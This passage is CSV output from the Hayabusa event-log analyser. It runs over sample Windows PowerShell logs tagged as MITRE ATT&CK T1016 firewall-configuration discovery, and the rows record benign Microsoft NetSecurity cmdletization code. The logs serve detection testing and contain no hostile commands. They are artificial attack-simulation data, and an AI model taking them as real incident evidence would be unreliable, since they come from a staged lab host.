[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6Dscp')) { [object]$__cmdletization_value = ${IcmpV6Dscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6Dscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IcmpV6RateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IcmpV6RateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IcmpV6RateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IpV6FilterExemptDscp')) { [object]$__cmdletization_value = ${IpV6FilterExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptDscp'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundP",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"arameters.ContainsKey('IpV6FilterExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${IpV6FilterExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'IpV6FilterExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptDscp')) { [object]$__cmdletization_value = ${DefBlockExemptDscp} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptDscp'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefBlockExemptRateLimitBytesPerSec')) { [object]$__cmdletization_value = ${DefBlockExemptRateLimitBytesPerSec} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'DefBlockExemptRateLimitBytesPerSec'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxStateEntries')) { [object]$__cmdletization_value = ${MaxStateEntries} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxStateEntries'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxPerIPRateLimitQueues')) { [object]$__cmdletization_value = ${MaxPerIPRateLimitQueues} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxPerIPRateLimitQueues'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnabledKeyingModules')) { [object]$__cmdletization_value = ${EnabledKeyingModules} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'EnabledKeyingModules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospKeyModules'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('FilteringFlags')) { [object]$__cmdletization_value = ${FilteringFlags} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'FilteringFlags'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.DospFlags'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicInterfaceAliases')) { [object]$__cmdletization_value = ${PublicInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateInterfaceAliases')) { [object]$__cmdletization_value = ${PrivateInterfaceAliases} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateInterfaceAliases'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PublicV6Address')) { [object]$__cmdletization_value = ${PublicV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PublicV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PrivateV6Address')) { [object]$__cmdletization_value = ${PrivateV6Address} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PrivateV6Address'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecDospSetting { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIPsecDoSPSetting')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIPsecDoSPSetting')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('ElementName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecDospSetting.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetIPsecIdentity"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetIPsecIdentity</DefaultNoun> </Class> <Enums> <Enum EnumName=""NetSecurity.ImpersonationType"" UnderlyingType=""uint32""> <Value Name=""None"" Value=""0""/> <Value Name=""Impersonated"" Value=""1""/> </Enum> <Enum EnumName=""NetSecurity.EffectiveAuthenticationMethod"" UnderlyingType=""uint32""> <Value Name=""PresharedKey"" Value=""0""/> <Value Name=""Certificate"" Value=""1""/> <Value Name=""Kerberos"" Value=""2""/> <Value Name=""Anonymous"" Value=""3""/> <Value Name=""SSL"" Value=""4""/> <Value Name=""NTLMv2"" Value=""5""/> <Value Name=""CGA"" Value=""6""/> <Value Name=""CertificateEcdsa256"" Value=""7""/> <Value Name=""CertificateEcdsa384"" Value=""8""/> <Value Name=""SSLEcdsa256"" Value=""9""/> <Value Name=""SSLEcdsa384"" Value=""10""/> <Value Name=""EAP"" Value=""11""/> </Enum> <Enum EnumName=""NetSecurity.IdFlags"" UnderlyingType=""uint32"" BitwiseFlags=""true""> <Value Name=""None"" Value=""0""/> <Value Name=""HealthCertificate"" Value=""1""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.098 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIPsecIdentity' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecMainModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecMainModeSA""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetMainModeSA"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetIPsecMainModeSA</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""Name""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByName"" IsMandatory=""true"" Position=""0"" Aliases=""ID""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetSAAssociation"" ResultRole=""Antecedent"" SourceRole=""Dependent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetQuickModeSA""/> <CmdletParameterMetadata PSName=""AssociatedNetIPsecQuickModeSA"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetIPsecQuickModeSA""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Remove"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:DeleteInstance""/> </Cmdlet> </InstanceCmdlets> </Class> <Enums> <Enum EnumName=""NetSecurity.EffectiveKeyModule"" UnderlyingType=""uint32""> <Value Name=""IkeV1"" Value=""0""/> <Value Name=""AuthIP"" Value=""1""/> <Value Name=""IkeV2"" Value=""2""/> </Enum> </Enums> </PowerShellMetadata>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.114 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetMainModeSA' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetIPsecMainModeSA { [CmdletBinding(DefaultParameterSetName='GetAll', 